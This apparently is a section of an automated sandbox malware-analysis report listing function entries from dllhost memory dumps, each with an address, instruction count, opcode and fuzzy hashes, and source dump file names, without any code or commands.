Opcode ID: 91fd07821daadab1265ad68730f035008732ecb52813c9118e1664ab308c2c66
Instruction ID: ddba34201e8666401dbd5f6b5ea09dd32ece661196884725d1931a9568188229
Opcode Fuzzy Hash: 91fd07821daadab1265ad68730f035008732ecb52813c9118e1664ab308c2c66
Instruction Fuzzy Hash: 56D0A77604938C6FC7030A709C019C43F399E471643418093F98489462C332467FDB75

Function 04BC2348 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 496c28b5989a08accaee4121d2129ce93bdd84c0d2b99606d4413e6226ab6e16
Instruction ID: 959a29ede33f5ec1a9ca550b2e41964361054be3c8a35b6c91efb3194b16d3ae
Opcode Fuzzy Hash: 496c28b5989a08accaee4121d2129ce93bdd84c0d2b99606d4413e6226ab6e16
Instruction Fuzzy Hash: FCD0C23208C3885FC202876498005983F554F92220F0A40F2EC084F6B3C2329C558796

Function 04BC60E0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f580ca1b9b4c69f99d88c12cf55e39ce14289946b38af3f3bb13b8fb9f2d304c
Instruction ID: fa91be2b1b565f9c8f27b3d08edf6eebae3cbb433bc43d9be41269e8676ab5b8
Opcode Fuzzy Hash: f580ca1b9b4c69f99d88c12cf55e39ce14289946b38af3f3bb13b8fb9f2d304c
Instruction Fuzzy Hash: F6E0E2320883897FCF034FA09C1099A3F36AF06254F094092FE444A4B3C2368572ABA5

Function 04BC3C4F Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c24d50c11eb760cabdfed64cd3e5758e508b49940696b824f38ceb4dbaaf4fef
Instruction ID: 34381cde213a7214c9caca51ef729bb60dbf4ceca2dc7003ae472602bad49538
Opcode Fuzzy Hash: c24d50c11eb760cabdfed64cd3e5758e508b49940696b824f38ceb4dbaaf4fef
Instruction Fuzzy Hash: FEE0866154C6849FC302675CA8DA65DBBE66F95100F9FC4AAC98C47453D624609A8783

Function 04BC4B80 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e723fcf04d7bf3c9e54356d0867271892e6c661f579ff781a486ae150b726ac7
Instruction ID: 8bca6bfc25c06b06400be035cb73b725c5b5308d739c9ab63e0793daf0e66053
Opcode Fuzzy Hash: e723fcf04d7bf3c9e54356d0867271892e6c661f579ff781a486ae150b726ac7
Instruction Fuzzy Hash: C9D0C73118EBC88FC30753B469556193F789D4301531A01DBE55DCF8B3D61AD555C356

Function 04BC23C8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63bcdd6ab46b5e3edbdab3c76e9a759ea248bf81bf62797482c5d46b66145f8d
Instruction ID: 0edf182dc9fb19580754841fbf084a3c3ba0e7c236ded1a8f764f90c0143dedc
Opcode Fuzzy Hash: 63bcdd6ab46b5e3edbdab3c76e9a759ea248bf81bf62797482c5d46b66145f8d
Instruction Fuzzy Hash: 22D0A7230C87A82ED70359641C115AA3FA94F61020B05C093ACC48F493D139DA55D270

Function 0485CCCA Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63a5065e1c959f05f73ee7cdaf257f050a024ee1fd1061a94fea284929c7fb37
Instruction ID: 9022327e3c090f95f129762b0769ea0db357820288c1c36bd6904b5018dec5ce
Opcode Fuzzy Hash: 63a5065e1c959f05f73ee7cdaf257f050a024ee1fd1061a94fea284929c7fb37
Instruction Fuzzy Hash: ECF0CB78E01129ABCB65CF55D984AD8BBF2BB49304F10C5D5E809A3220EB30AF84AF50

Function 04BC6C2A Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7919345b8aff9cf456a69edd5089e061ad4889234c14fbafbe9d3ac31942a853
Instruction ID: 072570bb0f69202098f821ebb6968261c1080a98bfd32f39428d633f2403c6d9
Opcode Fuzzy Hash: 7919345b8aff9cf456a69edd5089e061ad4889234c14fbafbe9d3ac31942a853
Instruction Fuzzy Hash: 13D05E3080E3C46FC706DBF0882646C7FB4AE0700070540EFD9858B2A3DA201A18C752

Function 04BC5558 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 654c371be00599333e059ffef0901852d5a8e897f2d2ca4c1d1110ddcd02ea57
Instruction ID: afd1c0750f7828b35752150db1cb1a4916689481fe120ff13ec2577d8a35aeb1
Opcode Fuzzy Hash: 654c371be00599333e059ffef0901852d5a8e897f2d2ca4c1d1110ddcd02ea57
Instruction Fuzzy Hash: E8D0233A8CD2982CCE1157F538D04DC2F090C6111430941EBF448CB873D52EF1116910

Function 0485E865 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7000d0d7795a86525ca1e9cd06c27e5d95284a62262612d4b5af2983a0cbbb32
Instruction ID: b8f01a8722bede1d9baf548a3d5d2baeb31c6f063cbbbf0d46281752e20e7e0a
Opcode Fuzzy Hash: 7000d0d7795a86525ca1e9cd06c27e5d95284a62262612d4b5af2983a0cbbb32
Instruction Fuzzy Hash: 36E07578A01608DFC750AF64ED4829C7BB1FB4A305F5045BAA80A92261DB341E85DF01

Function 008323F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863281637.0000000000832000.00000040.00000800.00020000.00000000.sdmp, Offset: 00832000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_832000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00aab0c443c48cfd7803f609f3da242149c8713e7c0831f9c32f9cdb8888be38
Instruction ID: f2c921debb0c607195ebbca0accf7717df7c6e8991f46c18220589d834b5a044
Opcode Fuzzy Hash: 00aab0c443c48cfd7803f609f3da242149c8713e7c0831f9c32f9cdb8888be38
Instruction Fuzzy Hash: 54D05E792096818FE716DA1CC1A4B9537D4FB91714F4A48F9A840CB763C768E9C1D640

Function 04BC2410 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 025ea0c615bc791ba7fcd62579dd1e2666712a69710d0a33b396db48cb0de212
Instruction ID: b3414b125ef5aaca435c4518a4713527e8475904a2011b3ce42efb6353824b0c
Opcode Fuzzy Hash: 025ea0c615bc791ba7fcd62579dd1e2666712a69710d0a33b396db48cb0de212
Instruction Fuzzy Hash: CCD0C9210CD3C92EC3075629AC205993F698D4316430A41E7E8808FCA3C61F88A7D3A5

Function 04BC7250 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d74b26fe583604d98d6bcc1c930ca83f2615df9a9308c1a586f135058467f866
Instruction ID: 06ee1fb61925f6ed4c0e0b7db803fc37689213439ba91b33d35b2437905964aa
Opcode Fuzzy Hash: d74b26fe583604d98d6bcc1c930ca83f2615df9a9308c1a586f135058467f866
Instruction Fuzzy Hash: 17D0127584E3C82EC72307B56C526953F694E53304B1A00EFD9848E6B3D966D82AC656

Function 04BC2780 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 996025b3d4f884d9591579c48fc12874fd556f6fde3aa70545720a4846ef548e
Instruction ID: 041f5cacffd13b2d0d05a83d24d7b7b419022f177f310d9ff63653fb0aaa5761
Opcode Fuzzy Hash: 996025b3d4f884d9591579c48fc12874fd556f6fde3aa70545720a4846ef548e
Instruction Fuzzy Hash: 79D0C92008E7C65FC307027518585997FA4494302430A40E78848CFEE3C61A885B8751

Function 04856998 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d69e94f31032f8ed9d9e7ec2a8af94448d535ad5501cfc38c7d0e81973401254
Instruction ID: 5fd670be61b3f1b1211543af73252f743e9c7c443a064eace80ac217b65b6af3
Opcode Fuzzy Hash: d69e94f31032f8ed9d9e7ec2a8af94448d535ad5501cfc38c7d0e81973401254
Instruction Fuzzy Hash: FBD0922018E3C6AFC303972898249983FA55E4751474F01E6E588CF8A3CA18A82A8392

Function 0485EED0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e865bc130cd07133c9f4996dddacd8bab9d69d75e7f8a9bbf6cac2e18326b37
Instruction ID: 35c3b02848541618cfc9ec4ada683f3b4dad69937f19bbb9f6ca94811957ba78
Opcode Fuzzy Hash: 8e865bc130cd07133c9f4996dddacd8bab9d69d75e7f8a9bbf6cac2e18326b37
Instruction Fuzzy Hash: C5D0C92018E3D68FC3072B282C141C87F65488342070A44E3D884CB8A3C61A481AD3A6

Function 0485F268 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13770d463e80b5fbfbe53f04bd96cfe895ee3323da222eeaf6c64d3e5ca9ea8a
Instruction ID: 602735208496e9f2de7d227793ee833cb93b5bda60860ec3c853b6f77c4e007c
Opcode Fuzzy Hash: 13770d463e80b5fbfbe53f04bd96cfe895ee3323da222eeaf6c64d3e5ca9ea8a
Instruction Fuzzy Hash: D0D0CA2408E3CA5FC34717606C102987FA8988341434A01D698C9CB8F3CA0E981A86AA

Function 0485F472 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e40f7f824f1085703b7470132e5c0491c34b541589aff56a56bfbfe7fd324ae2
Instruction ID: 35ae57b02e95c49feb7ec17eae96c3e464d91aedd15ee25916c3031fb3ce57d3
Opcode Fuzzy Hash: e40f7f824f1085703b7470132e5c0491c34b541589aff56a56bfbfe7fd324ae2
Instruction Fuzzy Hash: 6ED0C92128D3C90FC30763A8286011C7FA95E8B50470A01E7E984CF6A3CD15AD4AE367

Function 0485F748 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad8db5d446e2774ab810c0b36a89fe99d63e6eefd3fbf523d2c71e0bdeec6b9f
Instruction ID: e8927429d9bfcca2fd07e068cbcb5aaba86e4ea76a556dd67e79e5560ba709e1
Opcode Fuzzy Hash: ad8db5d446e2774ab810c0b36a89fe99d63e6eefd3fbf523d2c71e0bdeec6b9f
Instruction Fuzzy Hash: D1D0C9105CE3C10EC30783791C616DD7F700A83110F0A41EBD0868FDF3C149140A8B67

Function 04858652 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004858000.00000040.00000800.00020000.00000000.sdmp, Offset: 04858000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4858000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e906236288cdf12f6923e342a96fa3e7692f0a723a999ff6139a3670d299853e
Instruction ID: 82188538f09ac83c43dffc4856b389c21b3272c633b894821c62b70b2e9ffdfe
Opcode Fuzzy Hash: e906236288cdf12f6923e342a96fa3e7692f0a723a999ff6139a3670d299853e
Instruction Fuzzy Hash: 29D0A9F0409115CFE341DF90C999AE17BF1AF22328F0486E7C44A8B122C7B06A96DF20

Function 008323BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3863281637.0000000000832000.00000040.00000800.00020000.00000000.sdmp, Offset: 00832000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_832000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da6d56b05e0824c1466f7436676d03880dd85cbbbcf43d12f4d5f644cbad16be
Instruction ID: 6af1893b86c8c86996c9be95cd01784d373f96ed4e37566f83a17d97638059c2
Opcode Fuzzy Hash: da6d56b05e0824c1466f7436676d03880dd85cbbbcf43d12f4d5f644cbad16be
Instruction Fuzzy Hash: 0DD05E356452814BDB15DA0CC2D4F5973D4BB84B14F0644E8AC10CB372C7A8D8C0CA40

Function 04BC47B8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 616814825242e91a1e3b6a202e8095c868c60788e1e2173605592b75812daded
Instruction ID: be65f79fa6a9b9b987e37f78be53ca5bf893e89436db5873937db71baa876545
Opcode Fuzzy Hash: 616814825242e91a1e3b6a202e8095c868c60788e1e2173605592b75812daded
Instruction Fuzzy Hash: F1D0927018E2A55FC30746B4A82049C7F214A9321431A86FBE080CFDF3C22A8457DB5A

Function 04BC3362 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc601e22a51afca9d4b65818f0265197a26f37d8d7bb59e3237444797b17eca
Instruction ID: d132442b472093fc861e8fd37c36357c7c2c4a17e50aab3d4cdb099f81c3e6c1
Opcode Fuzzy Hash: bdc601e22a51afca9d4b65818f0265197a26f37d8d7bb59e3237444797b17eca
Instruction Fuzzy Hash: A3D0C97108E3D95EC307137468244993FB80D4B42571A40FBE984CF9A3C52AA595D36A

Function 04856AD0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a1057134b8663a0a914995590368100ff5d40a8cb748377aa613321c0d27a2
Instruction ID: 6145302fb16d0bf09fcad23c28b609de22092eec23395beed0b916334ab09736
Opcode Fuzzy Hash: b4a1057134b8663a0a914995590368100ff5d40a8cb748377aa613321c0d27a2
Instruction Fuzzy Hash: 71D0CA302CD3EA0EC30B82740C244A83F26484301832B42FFA088CFDA3C22EC44B8716

Function 0485110B Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.0000000004850000.00000040.00000800.00020000.00000000.sdmp, Offset: 04850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4850000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36bd951ca433e5b4f510183c95e1802d2b7e33d530e1b0c4e3111d7d0d7282a7
Instruction ID: eeb8d620abcc7c44d45843c927108b6e103d7da59ebacbf8f2d0b704877d6b6a
Opcode Fuzzy Hash: 36bd951ca433e5b4f510183c95e1802d2b7e33d530e1b0c4e3111d7d0d7282a7
Instruction Fuzzy Hash: BCD09E79A08114D7E7144F14ED583AC7664FB05355F144AA4AD09D61A0CBB9AE44CF82

Function 0485F832 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876536408.000000000485C000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_485c000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca7be44acfe1002871e659c9754eb4d6634cc25d99a0492631c411610d7c2dc3
Instruction ID: 31a1815f31ac6fa02f01c19ac92ed895ed0798dbd8899094ef3901acecafe628
Opcode Fuzzy Hash: ca7be44acfe1002871e659c9754eb4d6634cc25d99a0492631c411610d7c2dc3
Instruction Fuzzy Hash: 07C0021119E7D95FC34753641D206583F790C8341874F41D7D988CF9E3C68C995A87B6

Function 04BC58A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ede2f8a4e6d13124d1fbf4a37ee53450f1e7df6c8fc832c7bbb06e9a5e43f17a
Instruction ID: a30a39ac0d9c7acd616f9fb33a90a84f03572a8ca312a8d61bb7252edacd5df1
Opcode Fuzzy Hash: ede2f8a4e6d13124d1fbf4a37ee53450f1e7df6c8fc832c7bbb06e9a5e43f17a
Instruction Fuzzy Hash: B5D012B14CF3E88EC32307712C205503F684D5382830A42EBC884CF9E7E67A9848C36A

Function 04BC7080 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dfa4aeb94a5325560e3d9c50edf1d8985628b23ecc5be111d4157e2cc434c38
Instruction ID: e326e0e718135d5a8ce29b459c862f792c92f9820d08d3fc51650a7e8189f3a9
Opcode Fuzzy Hash: 0dfa4aeb94a5325560e3d9c50edf1d8985628b23ecc5be111d4157e2cc434c38
Instruction Fuzzy Hash: 66D0127908D3C4AFC7038B709891994BF315F13208B6540EFD5418E563C33A456BDB35

Function 04BC4881 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc40b82b761f63f9048087122d457d421e34e5fb40e4d06b2b24c9e2ca29d81
Instruction ID: ee2591cad446348c0351819663303cc0ca9d05221bb63f87e2556e9b37e341c6
Opcode Fuzzy Hash: 8bc40b82b761f63f9048087122d457d421e34e5fb40e4d06b2b24c9e2ca29d81
Instruction Fuzzy Hash: B9C002245CE3D91ECB67427518604DC6F31488205471A42EBD495DB9E3C64D450B8B62

Function 04BC3412 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbf9877f8614de95e3b3213cc667520ae432ed11e0b92732edc5c3e621b69585
Instruction ID: 4975fa94c833d27d377aeeab71b31c8246aafe91fda6e308e505c7c8f81ed90f
Opcode Fuzzy Hash: dbf9877f8614de95e3b3213cc667520ae432ed11e0b92732edc5c3e621b69585
Instruction Fuzzy Hash: 88D012110CE3DC1DC30342B12C294A97FB80C4301430A45D3E980DF893C51D9559D375

Function 04BC3442 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faebd693a28209b785621a9716a45cc327707dab78c15cf2aeefd7a653d3d95e
Instruction ID: 75613316619c83024d736514e7ff48f2ca65a1e50985302e4a8a39b54ba4a092
Opcode Fuzzy Hash: faebd693a28209b785621a9716a45cc327707dab78c15cf2aeefd7a653d3d95e
Instruction Fuzzy Hash: B6D0923204929EBBCF034E90AC0189A3F66AF46254B098052FE440A472D7379A71ABA5

Function 04BC25F8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8d92d0f6ffc5ec9726f5a869dbca51fc34126cbec692fb411b808e660ce2018
Instruction ID: cf3fed19be29c71a51e58cb9b29679bde3e1703f0cb0438cdbd354cfbba23c72
Opcode Fuzzy Hash: e8d92d0f6ffc5ec9726f5a869dbca51fc34126cbec692fb411b808e660ce2018
Instruction Fuzzy Hash: 5AD0C93008E3C21FCB2386B9586255C7F705E83205B1E46FFD4858BDD3C11E405ACB12

Function 04BC1A32 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68965346a7984aeb61ac421707f3b0a1de86c0daf1a945e812ccc7b4463d13d7
Instruction ID: 9027c4b605e556f2def887d7e1971e4cdabae4b9192585b3426f83fc4e8e555a
Opcode Fuzzy Hash: 68965346a7984aeb61ac421707f3b0a1de86c0daf1a945e812ccc7b4463d13d7
Instruction Fuzzy Hash: D0D0A770A453089BFB109B208C65BDC3A73AF56300FD449C6A609BE2E5D7744E42DF41

Function 04BC6FF0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f59c52c1e1e37def693dd37b871403235a7095c30cb410083885fec29cc8b131
Instruction ID: abb6c30810bb021276b415b44fe0426d0ce72fb1287fff04386f3a1d6f6dd409
Opcode Fuzzy Hash: f59c52c1e1e37def693dd37b871403235a7095c30cb410083885fec29cc8b131
Instruction Fuzzy Hash: 71D09E710492C8EFCB125F74EC55B997F71BF12209F2844AEE5450D522C6378462DF55

Function 04BC2309 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbcd8a3f9b3810684ebd01652e6f7e096d20c1d067a78627f94aad59ba24fc8f
Instruction ID: 04422577b5ba51cd6908dbf55bb8b096c1acb35de031e362e75e739cd251524c
Opcode Fuzzy Hash: dbcd8a3f9b3810684ebd01652e6f7e096d20c1d067a78627f94aad59ba24fc8f
Instruction Fuzzy Hash: 28C080234CD35D2FC3135950BC005D83F144B73170B0A40B3EC444F993D6164D5BD2A8

Function 04BC2492 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f645511c4ffd045bc6c9ad235755e37315b4b4cb755ffd45cc01c5dfb755768
Instruction ID: 83367933f2dda7e5b864adcadd6c45049bda0a0d6c35e7f5480cceac822632a7
Opcode Fuzzy Hash: 2f645511c4ffd045bc6c9ad235755e37315b4b4cb755ffd45cc01c5dfb755768
Instruction Fuzzy Hash: B8C0122108D3CA8FC303036828282583FB86D8301030A00C3EC88CB4E3C20D2859C362

Function 04BC60C1 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c5739c7da24dc839e630bc680a09945eea9eeb92153d9e6f1880014a8a32d01
Instruction ID: 33eb0564eb7421edad7297a76794d33d120585e006d1fa9479880d040ab85b65
Opcode Fuzzy Hash: 1c5739c7da24dc839e630bc680a09945eea9eeb92153d9e6f1880014a8a32d01
Instruction Fuzzy Hash: D0C0021518E7DA0EC74712642861A59BF78088302435A00E7988C8B8E7DA5859599362

Function 04BC4860 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3876929822.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4bc0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82d288902f215d88e801fe24cd15df80dc79fa12b0b694294ec5ee5cae9dc4d5
Instruction ID: 72362a65c82d647a08f2fceceecbc0bbb16ad9dcd69232063a4574810cda9f1e
Opcode Fuzzy Hash: 82d288902f215d88e801fe24cd15df80dc79fa12b0b694294ec5ee5cae9dc4d5
Instruction Fuzzy Hash: 81C0022118E7E50FD74756A418100DC7B35594205435A51E7D548CFDA3C21D454B8392

Function 04BC6110 Relevance: .0, Instructions: 12COMMON

